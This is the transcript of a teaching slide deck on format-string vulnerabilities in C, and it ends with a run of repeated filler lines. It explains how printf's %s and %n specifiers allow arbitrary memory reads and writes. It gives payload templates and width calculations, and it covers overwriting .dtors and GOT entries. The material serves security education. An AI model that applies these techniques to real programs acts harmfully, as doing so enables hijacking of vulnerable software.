Format strings

Format strings Reporter : Nickle Nickle@NSC

Agenda • Introduction • Reading from arbitrary memory address • Write to arbitrary memory address • Direct parameter access • Detours with dtors • Overwriting the global offset table • Conclusion

Introduction • Printf() function • Format • %d - decimal • %u - unsigned decimal • %x - hexadecimal • %s - string, start address of string • %n – number of bytes written so far

Introduction (cont.) Low address EBP • printf(“blah %d %d %d %d”,a ,b ,c ,d); • Then, if d is missed? • %d will print the value of forth parameter position • EBP – OFFSET • The format-string vulnerability • printf(“%s”,string); • printf(string); Address of format string a b c d -4 * 4 High address

Reading from arbitrary memory address • The format-string is processed one by one • Format parameter %s read the address and print out the content until it reach NULL byte • If we can control the address which %s read, we can get any content in whole memory • Demo code (fmt_vuln.c)

Reading from arbitrary memory address • The input parameter • %s read the content which the address is in the beginning of format string ... Target address %x. %x. %x. %s offset

Low address Reading from arbitrary memory address .... EBP SFP • The memory layout RET Address of format string .... buffer Local variable SFP RET .... High address

Write to arbitrary memory address • Format parameter %n will write the number of byte written so far to the variable • printf(“blablabla %n”,variable); • demo cdoe (fmt_vuln)

Write to arbitrary memory address • The input parameter • Control the written value (%βx) ... Target address %x. %x. %x. %n offset ... Target address %x. %x. %βx. %n offset

Write to arbitrary memory address • Write the address into target

Write to arbitrary memory address • Write once • Target address ... Target address %x. %βx. %n. %βx. %n. %βx. %n. %βx. %n 08049570 08049572 OFFSET 08049571 OFFSET 08049573 OFFSET 4 bytes 4 bytes 4 bytes

Write to arbitrary memory address • Who to calculate the β? • E.g. 0x dd cc bb aa • Current target value is X • The last width of %x is Y • Calculate it • X – Y = Z • 0xaa – Z = β1 • 0xbb – 0xaa = β2 • 0xcc – 0xbb = β3 • 0xdd – 0xcc = β4 ... Target address %x. %β1x. %n. %β2x. %n. %β3x. %n. %β4 x. %n

Write to arbitrary memory address • Simple way to calculate • Fmtbuilder - http://packetstormsecurity.org/papers/unix/fmtbuild.htm • Formulate • 0xbfbff26c (HOB => 0xbfbf, LOB => 0xf26c) • HOB < LOB • addr+2addr%.[HOB -8]x%[offset]$hn%.[LOB -HOB]x[offset+ 1]$hn • HOB > LOB • addr+2addr%.[LOB -8]x%[offset + 1]$hn%.[HOB -LOB]x[offset]$hn

Direct parameter access • Format parameter • %N$x – the Nth parameter Target address %x. ... %βx. %n %βx. %n %βx. %n %βx. %n Target address %θ$βx. % θ$ n %θ$βx. % θ$ n %θ$βx. % θ$ n %θ$βx. % θ$ n

Detours with dtors • .dtors and .ctors are made for destructors and constructors • .dtors section is writable • .dtors section is that it is included in all binaries compiled with the GNU C compiler • Dome code

Overwriting the global offset table • Procedure linkage table (PLT) • Consist of many jump instructions • But the PLT is read-only • The address in PLT are not the address which they jump, but pointers to addresses • These memory addresses lie in another special section, called the global offset table (GOT) • It is writeable • Demo code

Conclusion • Using the format function must be carefully • You can read/write from/to arbitrary memory address

Reference • Hacking – the art of exploitation, Jon Erickson • Format String Vulnerability, Kudo

Format strings

Format strings

Presentation Transcript

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings

Strings